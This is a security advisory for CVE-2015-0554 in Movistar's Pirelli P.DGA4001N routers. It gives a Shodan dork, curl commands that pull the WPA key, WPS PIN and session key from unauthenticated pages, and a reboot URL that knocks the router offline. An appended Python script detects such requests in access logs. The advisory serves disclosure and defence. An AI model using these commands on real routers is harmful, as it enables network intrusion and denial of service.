- Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure (HomeStation Movistar)
- Author: Eduardo Novella (@enovella_) ednolo[@]inf.upv[dot]es
- Version: Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork: "Dropbear 0.46 country:es" (as of now this dork no longer appears to work)

- Summary:
HomeStation Movistar has deployed routers manufactured by Pirelli. These routers serve their configuration HTML pages to any public IP address in the world, with neither authentication nor any other protection against unauthorized extraction of sensitive information (WPA pre-shared key, WPS PIN, session key, BSSID).

- The vulnerability and the way to exploit it:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin= '12820078';

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';

$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>

# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------

http://${IP_ADDRESS}/resetrouter.html

We can observe in the source:

<!-- hide
var sessionKey='846930886';
function btnReset() {
   var loc = 'rebootinfo.cgi?';
   loc += 'sessionKey=' + sessionKey;
   var code = 'location="' + loc + '"';
   eval(code);
}
// done hiding -->

Since the session key is disclosed in the page itself, the reboot CGI can be called without any authentication:

http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123

# All the information we can fetch from the device:
+ Conclusion:
This vulnerability can be exploited remotely and should be patched as soon as possible. An attacker could be monitoring our network or, even worse, our router could become a member of a botnet without our knowledge. A first mitigation is either to update these routers to the latest firmware version or to install a third-party firmware such as OpenWRT or DD-WRT on them.

+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html

+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
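As an added example that is not part of this advisory, the following Python script shows how a defender could spot exploitation of the pages described above in HTTP access logs collected by a reverse proxy, IDS or firewall sitting in front of the router: it flags any request for the disclosure pages or the reboot CGI coming from an address outside the LAN. The Common Log Format, the 192.168.1.0/24 LAN range and the sample log lines are constructed assumptions.

```python
# Added example (not from the advisory): flag WAN-side requests to the
# unauthenticated P.DGA4001N pages in constructed Common Log Format lines.
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Pages named in the advisory: the disclosure pages and the reboot CGI.
SENSITIVE_PATHS = {
    "/wlsecurity.html": "wifi-secrets",  # wpaPskKey, WscDevPin, sessionKey
    "/wlcfg.html": "bssid",
    "/resetrouter.html": "reboot-page",  # leaks the sessionKey used to reboot
    "/rebootinfo.cgi": "reboot-dos",
}
# Assumption: the LAN behind the router is 192.168.1.0/24 (constructed).
LAN_NETWORKS = [ipaddress.ip_network("192.168.1.0/24")]
# Minimal CLF parser: client ip, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_external(ip: str) -> bool:
    """True when the client address lies outside the known LAN ranges."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LAN_NETWORKS)

def classify(line: str):
    """Return (client_ip, path, label, query) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    label = SENSITIVE_PATHS.get(target.path)
    if label is None or not is_external(m["ip"]):
        return None
    return (m["ip"], target.path, label, parse_qs(target.query))

def find_alerts(lines):
    """Run classify() over every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log: LAN requests are benign, WAN-side ones are alerts.
SAMPLE_LOG = [
    '192.168.1.20 - - [05/Jan/2015:10:00:01 +0100] "GET /wlsecurity.html HTTP/1.1" 200 4113',
    '203.0.113.7 - - [05/Jan/2015:10:00:05 +0100] "GET /wlsecurity.html HTTP/1.1" 200 4113',
    '198.51.100.9 - - [05/Jan/2015:10:01:00 +0100] "GET /rebootinfo.cgi?sessionKey=233665123 HTTP/1.1" 200 310',
    '192.168.1.20 - - [05/Jan/2015:10:02:00 +0100] "GET /index.html HTTP/1.1" 200 980',
]

if __name__ == "__main__":
    for ip, path, label, query in find_alerts(SAMPLE_LOG):
        print(f"ALERT {label}: {ip} requested {path} {query}")
```

On a device that cannot be patched, the same path list can also drive a blocking rule on the WAN interface rather than just an alert.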